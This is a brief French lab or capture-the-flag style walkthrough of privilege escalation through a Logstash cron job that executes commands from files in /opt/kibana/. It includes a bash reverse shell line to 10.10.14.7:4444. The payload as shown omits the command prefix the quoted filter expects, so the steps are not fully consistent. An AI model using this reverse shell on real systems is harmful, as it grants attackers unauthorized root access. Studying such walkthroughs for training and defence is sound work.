Tâches Cron (Logstash) - Linux Privilege Escalation

Abusing Logstash

On recherche tous les fichiers accessibles avec l'utilisateur kibana :

find / -user kibana 2>/dev/null | grep -vE "usr|var|proc"

En accédant à Logstash, on découvre trois fichiers de configuration :

filter.conf
input.conf
output.conf

En résumé, Logstash exécute une tâche cron qui vérifie toutes les 10 secondes si un fichier nommé logstash_* existe dans le répertoire /opt/kibana/. Si un fichier correspondant est trouvé et contient une commande avec un input spécifique, sous la forme :

"message" => "Ejecutar\scomando\s:\s+%{GREEDYDATA:comando}"

Pour exploiter cette vulnérabilité, on crée un fichier nommé logstash_exec dans le répertoire /opt/kibana/ avec le contenu suivant :

bash -i >& /dev/tcp/10.10.14.7/4444 0>&1

Ensuite, on écoute sur le port 4444, et on obtient un accès root.

Mis à jour il y a 1 an

hashtagAbusing Logstash

Abusing Logstash